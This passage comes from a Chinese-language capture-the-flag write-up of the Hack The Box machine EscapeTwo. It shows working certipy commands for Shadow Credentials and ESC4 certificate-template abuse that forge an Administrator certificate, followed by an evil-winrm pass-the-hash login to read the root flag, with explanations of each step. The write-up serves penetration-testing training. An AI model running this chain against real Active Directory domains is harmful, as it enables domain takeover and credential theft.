[*] Successfully added Key Credential with device ID 'ac8531c5-99b8-8310-0b81-bb01fd9ff206' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

[核心原理深度剖析] WHfB 与 msDS-KeyCredentialLink

Shadow Credentials 技术：利用了 Windows Hello for Business (WHfB) 的认证机制。 msDS-KeyCredentialLink：这是 AD 用户的一个属性，用于存储认证公钥。 攻击流程：

攻击者（有写属性权限）生成一对 RSA 密钥。

将公钥写入目标用户的 msDS-KeyCredentialLink 属性。

使用对应的私钥，通过 Kerberos 的 PKINIT 扩展协议向 KDC 请求 TGT。

KDC 验证公钥匹配，颁发 TGT。工具从 TGT 中解密出目标的 NTLM Hash。优势：无需重置目标密码，隐蔽性极高。

不管怎么样，现在我们已经拿到了ca_svc的哈希了。

既然ca_svc是证书发布者，那么以他的身份看看模板是否有漏洞。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy find -vulnerable -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.186.117  -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: Could not connect: timed out
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via RRP: [Errno Connection error (198.18.0.20:445)] timed out
[!] Failed to get CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

利用 ca_svc 的 Hash 登录，发现其属于 Cert Publishers 组，且该组对 DunderMifflinAuthentication 证书模板有写权限，符合 ESC4 漏洞特征

利用ca_svc的权限对DunderMifflinAuthentication进行覆盖更新（太卡了又换ip了）

┌─[root@htb-4w9mye2vqf]─[/home/skyarrow/Desktop]
└──╼ #certipy template -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.186.117 -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

之后用改造好的模板请求管理员证书，注意，这里一定要在更新后迅速执行该命令。

┌─[root@htb-4w9mye2vqf]─[/home/skyarrow/Desktop]
└──╼ #certipy req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.129.186.117 -dns 10.129.186.117 -dc-ip 10.129.186.117
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with multiple identifications
    UPN: 'Administrator@sequel.htb'
    DNS Host Name: '10.129.186.117'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_10.pfx'
┌─[root@htb-4w9mye2vqf]─[/home/skyarrow/Desktop]

通过证书获取到管理员哈希

┌─[root@htb-4w9mye2vqf]─[/home/skyarrow/Desktop]
└──╼ #certipy auth -pfx administrator_10.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
    [0] UPN: 'Administrator@sequel.htb'
    [1] DNS Host Name: '10.129.186.117'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

之后直接登录就可以了。

┌─[root@htb-4w9mye2vqf]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -H 7a8d4e04986afa8ed4060f75e5a0b3ff -u 'administrator' -i 10.129.186.133
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
18ff3ce3ee8f6f2a78e10221d0956c59

配置即漏洞：证书模板定义了颁发证书的规则。 ESC4 (Vulnerable Template Access Control)：攻击者对模板对象有写权限。 ESC1 (SAN Spoofing)：攻击者通过修改配置，开启 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志位。这允许申请者在 CSR (证书签名请求) 的 SAN (Subject Alternative Name) 字段中填入任意用户（如 Administrator）。 最终效果：AD CS 信任模板配置 -> 签发“管理员”证书 -> 域控信任 CA 签发的证书 -> 攻击者获得域管权限。这是一个从“配置权限”到“身份伪造”的完整闭环。

#windows

从零开始的windows生活-EscapeTwo

http://example.com/2026/01/21/从零开始的windows生活-EscapeTwo/

Author

Skyarrow

Posted on

January 21, 2026

Licensed under

从零开始的GOAD生活(上) Previous

从零开始的Windows生活-Administrator Next